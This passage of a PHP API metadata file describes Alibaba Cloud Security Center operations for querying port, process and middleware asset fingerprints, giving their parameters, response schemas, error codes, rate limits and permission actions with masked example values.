'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '50d213b4-3a35-427a-b8a5-04b0c7e1****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'BindIp', 'in' => 'query', 'schema' => ['description' => 'The IP address bound to the port.'."\n", 'type' => 'string', 'required' => false, 'example' => '0.0.XX.XX', 'title' => ''], ], [ 'name' => 'Extend', 'in' => 'query', 'schema' => ['description' => 'Specifies whether fuzzy search by port number is supported. If you want to use fuzzy search, set the parameter to **1**. If you set the parameter to a different value or leave the parameter empty, fuzzy search is not supported.'."\n", 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the NextToken method to retrieve a new page of results. If you set UseNextToken to true, the value of TotalCount is not returned. Valid values:'."\n" ."\n" .'- **true**: The NextToken method is used.'."\n" .'- **false**: The NextToken method is not used.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The value of NextToken that is returned when the NextToken method is used. You do not need to specify this parameter for the first request.', 'type' => 'string', 'required' => false, 'example' => 'AAAAAV3MpHK1AP0pfERHZN5pu6k+AtdhNE3kgQEK36GujZ5on+tWdc+4WoaoMP/kUNxxxx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '0FA7F1F4-488D-52CA-9BFC-3E47793B49D1', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NextToken' => ['description' => 'The value of NextToken that is returned when the NextToken method is used.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'The fingerprints of the ports.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Pid' => ['description' => 'The ID of the server process that listens on the port.'."\n", 'type' => 'string', 'example' => '522', 'title' => ''], 'BindIp' => ['description' => 'The IP address bound to the port.'."\n", 'type' => 'string', 'example' => '0.0.X.X', 'title' => ''], 'Ip' => ['description' => 'The IP address of the network interface controller (NIC) that is bound to the listening port.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'ProcName' => ['description' => 'The name of the server process.'."\n", 'type' => 'string', 'example' => 'sshd', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.'."\n", 'type' => 'string', 'example' => 'i-hp35tftuh52wbp1g****', 'title' => ''], 'Port' => ['description' => 'The listener port.'."\n", 'type' => 'string', 'example' => '22', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '100.104.XX.XX', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '162eb349-c2d9-4f8b-805c-75b43d4c****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the server.'."\n", 'type' => 'string', 'example' => 'hc-host-****', 'title' => ''], 'Proto' => ['description' => 'The network protocol that is used by the listening port.'."\n", 'type' => 'string', 'example' => 'tcp', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp of the last fingerprint collection. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1649149566000', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query Asset Fingerprint Information of Port Assets', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyPortDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyPortDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"0FA7F1F4-488D-52CA-9BFC-3E47793B49D1\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"Count\\": 1,\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"Propertys\\": [\\n {\\n \\"InternetIp\\": \\"192.168.XX.XX\\",\\n \\"Pid\\": \\"522\\",\\n \\"BindIp\\": \\"0.0.X.X\\",\\n \\"Ip\\": \\"192.168.XX.XX\\",\\n \\"ProcName\\": \\"sshd\\",\\n \\"InstanceId\\": \\"i-hp35tftuh52wbp1g****\\",\\n \\"Port\\": \\"22\\",\\n \\"IntranetIp\\": \\"100.104.XX.XX\\",\\n \\"Uuid\\": \\"162eb349-c2d9-4f8b-805c-75b43d4c****\\",\\n \\"InstanceName\\": \\"hc-host-****\\",\\n \\"Proto\\": \\"tcp\\",\\n \\"CreateTimestamp\\": 1649149566000\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 0FA7F1F4-488D-52CA-9BFC-3E47793B49D1\\n \\n 1\\n 10\\n 1\\n 1\\n \\n \\n 2022-04-05 17:06:06\\n 192.168.XX.XX\\n 522\\n 0.0.XX.XX\\n 192.168.XX.XX\\n sshd\\n i-hp35tftuh52wbp1g****\\n 22\\n 100.104.XX.XX\\n 162eb349-c2d9-4f8b-805c-75b43d4c****\\n hc-host-****\\n tcp\\n 1649149566000\\n \\n","errorExample":""}]', ], 'DescribePropertyPortItem' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'ForceFlush', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcibly refresh the data to be queried.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port number.', 'type' => 'string', 'required' => false, 'example' => '22', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to display on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page to display in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries to display on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '163', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyItems' => [ 'description' => 'The port information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Port' => ['description' => 'The listening port number.', 'type' => 'string', 'example' => '22', 'title' => ''], 'Count' => ['description' => 'The number of servers associated with the port.', 'type' => 'integer', 'format' => 'int32', 'example' => '495', 'title' => ''], 'Proto' => ['description' => 'The network protocol associated with the port.', 'type' => 'string', 'example' => 'tcp', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DescribePropertyPortItem', 'errorMessage' => 'get property port detail error', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve all port information', 'summary' => 'Retrieves information about all ports.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyPortItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyPortItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 5,\\n \\"TotalCount\\": 163,\\n \\"Count\\": 5\\n },\\n \\"PropertyItems\\": [\\n {\\n \\"Port\\": \\"22\\",\\n \\"Count\\": 495,\\n \\"Proto\\": \\"tcp\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribePropertyProcDetail' => [ 'summary' => 'Query Details of Asset Fingerprint Collection Process', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name or IP address of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'required' => false, 'example' => '8888', 'title' => ''], ], [ 'name' => 'User', 'in' => 'query', 'schema' => ['description' => 'The user who runs the process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'root', 'title' => ''], ], [ 'name' => 'Cmdline', 'in' => 'query', 'schema' => ['description' => 'The startup parameter of the process.'."\n", 'type' => 'string', 'required' => false, 'example' => './8888', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '50d213b4-3a35-427a-b8a5-04b0c7e1****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'ProcTimeStart', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the process starts. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1648809853000', 'title' => ''], ], [ 'name' => 'ProcTimeEnd', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the process ends. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1649587453000', 'title' => ''], ], [ 'name' => 'Extend', 'in' => 'query', 'schema' => ['description' => 'Specifies whether fuzzy search by process name is supported. If you want to use fuzzy search, set the parameter to 1. If you set the parameter to a different value or leave the parameter empty, fuzzy search is not supported.'."\n", 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to query the account ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the NextToken method to retrieve a new page of results. If you set UseNextToken to true, the value of TotalCount is not returned. Valid values:'."\n" ."\n" .'- **true**: The NextToken method is used.'."\n" .'- **false**: The NextToken method is not used.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The value of NextToken that is returned when the NextToken method is used. You do not need to specify this parameter for the first request.', 'type' => 'string', 'required' => false, 'example' => 'AAAAAV3MpHK1AP0pfERHZN5pu6k+AtdhNE3kgQEK36GujZ5on+tWdc+4WoaoMP/kUNxxxx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'AA47D46F-10DE-138C-BBB4-8A0003F75CD7', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NextToken' => ['description' => 'The value of NextToken that is returned when the NextToken method is used.', 'type' => 'string', 'example' => 'B604532DEF982B875E8360A6EFA3B***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'An array that consists of the fingerprints of the processes.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Pid' => ['description' => 'The ID of the process.'."\n", 'type' => 'string', 'example' => '12826', 'title' => ''], 'User' => ['description' => 'The user who runs the process.'."\n", 'type' => 'string', 'example' => 'root', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server that is associated with the process.'."\n", 'type' => 'string', 'example' => 'i-hp35tftuh52wbp1g****', 'title' => ''], 'Cmdline' => ['description' => 'The startup parameter of the process.'."\n", 'type' => 'string', 'example' => './8888', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'EuidName' => ['description' => 'The permission that is required to run the process.'."\n", 'type' => 'string', 'example' => 'root', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server that is associated with the process.'."\n", 'type' => 'string', 'example' => '162eb349-c2d9-4f8b-805c-75b43d4c****', 'title' => ''], 'StartTime' => ['description' => 'The time when the process starts.'."\n", 'type' => 'string', 'example' => '2019-08-07 10:09:05', 'title' => ''], 'Pname' => ['description' => 'The name of the parent process to which the process belongs.'."\n", 'type' => 'string', 'example' => 'start***.s', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server that is associated with the process.'."\n", 'type' => 'string', 'example' => 'hc-host-****', 'title' => ''], 'Path' => ['description' => 'The path of the process.'."\n", 'type' => 'string', 'example' => '/root/Oracle/Middleware/***/8888', 'title' => ''], 'Md5' => ['description' => 'The MD5 hash value of the process file.'."\n", 'type' => 'string', 'example' => '842644ea3d88bd7f7e14c1c089ef****', 'title' => ''], 'Name' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'example' => 'agetty', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp of last data collection. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1565686951000', 'title' => ''], 'StartTimeDt' => ['description' => 'The timestamp when the process starts. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1648783107000', 'title' => ''], 'IsPackage' => ['description' => 'Indicates whether the process is a package installation process. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'State' => ['description' => 'The status of the process.'."\n", 'type' => 'string', 'example' => 'sleeping', 'title' => ''], 'FileHash' => ['description' => 'Process file hash information.', 'type' => 'string', 'example' => '935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d4****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query Asset Fingerprint of Process Assets', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyProcDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyProcDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"AA47D46F-10DE-138C-BBB4-8A0003F75CD7\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 1,\\n \\"Count\\": 1,\\n \\"NextToken\\": \\"B604532DEF982B875E8360A6EFA3B***\\"\\n },\\n \\"Propertys\\": [\\n {\\n \\"InternetIp\\": \\"192.168.XX.XX\\",\\n \\"Pid\\": \\"12826\\",\\n \\"User\\": \\"root\\",\\n \\"InstanceId\\": \\"i-hp35tftuh52wbp1g****\\",\\n \\"Cmdline\\": \\"./8888\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"EuidName\\": \\"root\\",\\n \\"Uuid\\": \\"162eb349-c2d9-4f8b-805c-75b43d4c****\\",\\n \\"StartTime\\": \\"2019-08-07 10:09:05\\",\\n \\"Pname\\": \\"start***.s\\",\\n \\"InstanceName\\": \\"hc-host-****\\",\\n \\"Path\\": \\"/root/Oracle/Middleware/***/8888\\",\\n \\"Md5\\": \\"842644ea3d88bd7f7e14c1c089ef****\\",\\n \\"Name\\": \\"agetty\\",\\n \\"CreateTimestamp\\": 1565686951000,\\n \\"StartTimeDt\\": 1648783107000,\\n \\"IsPackage\\": 1,\\n \\"State\\": \\"sleeping\\",\\n \\"FileHash\\": \\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d4****\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n AA47D46F-10DE-138C-BBB4-8A0003F75CD7\\n \\n 1\\n 10\\n 1\\n 1\\n \\n \\n 2022-04-05 17:06:06\\n 192.168.XX.XX\\n 12826\\n root\\n i-hp35tftuh52wbp1g****\\n ./8888\\n 1.2.3.2\\n root\\n 162eb349-c2d9-4f8b-805c-75b43d4c****\\n 2019-08-07 10:09:05\\n start***.s\\n hc-host-****\\n /root/Oracle/Middleware/***/8888\\n 842644ea3d88bd7f7e14c1c089ef****\\n agetty\\n 1565686951000\\n 1648783107000\\n 1\\n sleeping\\n \\n","errorExample":""}]', ], 'DescribePropertyProcItem' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'ForceFlush', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcefully refresh the data that you want to query.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'BD8AD4C6-A169-4FA3-BA1F-ED40ED52973B', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '372', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyItems' => [ 'description' => 'An array that consists of the processes returned.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'example' => '.ss', 'title' => ''], 'Count' => ['description' => 'The number of servers on which the process runs.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '8888', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribePropertyProcItem', 'summary' => 'Queries information about all processes.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyProcItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyProcItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"BD8AD4C6-A169-4FA3-BA1F-ED40ED52973B\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 5,\\n \\"TotalCount\\": 372,\\n \\"Count\\": 5\\n },\\n \\"PropertyItems\\": [\\n {\\n \\"Name\\": \\".ss\\",\\n \\"Count\\": 8888\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n\\n\\n (sd-**)\\n 7\\n\\n\\n 6Cm***\\n 1\\n\\nBD8AD4C6-A169-4FA3-BA1F-ED40ED52973B\\n\\n 2\\n 395\\n 2\\n 1\\n\\n","errorExample":""}]', ], 'DescribePropertyScaDetail' => [ 'summary' => 'Queries the details of the middleware list on the Asset Fingerprints investigation page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Biz', 'in' => 'query', 'schema' => ['description' => 'The type of Asset Fingerprints to query. Default value: **sca**. Valid values:'."\n" ."\n" .'- **sca**: middleware'."\n" .'- **sca_database**: database'."\n" .'- **sca_web**: web service'."\n" ."\n" .'> If you do not settings this parameter, the default value **sca** is used, which indicates that middleware Asset Fingerprints information is queried.', 'type' => 'string', 'required' => false, 'example' => 'sca', 'title' => ''], ], [ 'name' => 'SearchItem', 'in' => 'query', 'schema' => ['description' => 'Settings the type of the conditional query. Valid values:'."\n" .'- **name**: the name of the middleware, database, or web service.'."\n" .'- **type**: the type of the middleware, database, or web service.'."\n" ."\n" .'> The **SearchItem** and **SearchInfo** parameters must be used together. You must settings both parameters for the query to take effect (settings only one is invalid). This allows you to view all data of the specified Asset Fingerprints by name or type.', 'type' => 'string', 'required' => false, 'example' => 'name', 'title' => ''], ], [ 'name' => 'SearchInfo', 'in' => 'query', 'schema' => ['description' => 'The content to query. The content varies based on the value of **SearchItem**:'."\n" .'- If **SearchItem** is settings to **name**, enter the name of the Asset Fingerprints.'."\n" .'- If **SearchItem** is settings to **type**, select the type of the Asset Fingerprints. Valid values: '."\n" .' - **system_service**: system service'."\n" .' - **software_library**: software library'."\n" .' - **docker_component**: container component'."\n" .' - **database**: database'."\n" .' - **web_container**: web container'."\n" .' - **jar**: JAR package'."\n" .' - **web_framework**: web framework '."\n" ."\n" .'> The **SearchItem** and **SearchInfo** parameters must be used together. You must settings both parameters for the query to take effect (settings only one is invalid). This allows you to view all data of the specified Asset Fingerprints by name or type.', 'type' => 'string', 'required' => false, 'example' => 'openssl', 'title' => ''], ], [ 'name' => 'SearchCriteriaList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of search criteria.', 'type' => 'array', 'items' => [ 'title' => '', 'description' => 'The search criterion.', 'type' => 'object', 'properties' => [ 'Name' => ['title' => '', 'description' => 'The name of the search criterion.', 'type' => 'string', 'example' => 'Name', 'required' => false], 'Value' => ['title' => '', 'description' => 'The filter value of the search criterion.', 'type' => 'string', 'example' => 'test', 'required' => false], ], 'required' => false, 'example' => '', ], 'required' => false, 'maxItems' => 20, 'example' => '', ], ], [ 'name' => 'ScaName', 'in' => 'query', 'schema' => ['description' => 'The name of the Asset Fingerprints to query.', 'type' => 'string', 'required' => false, 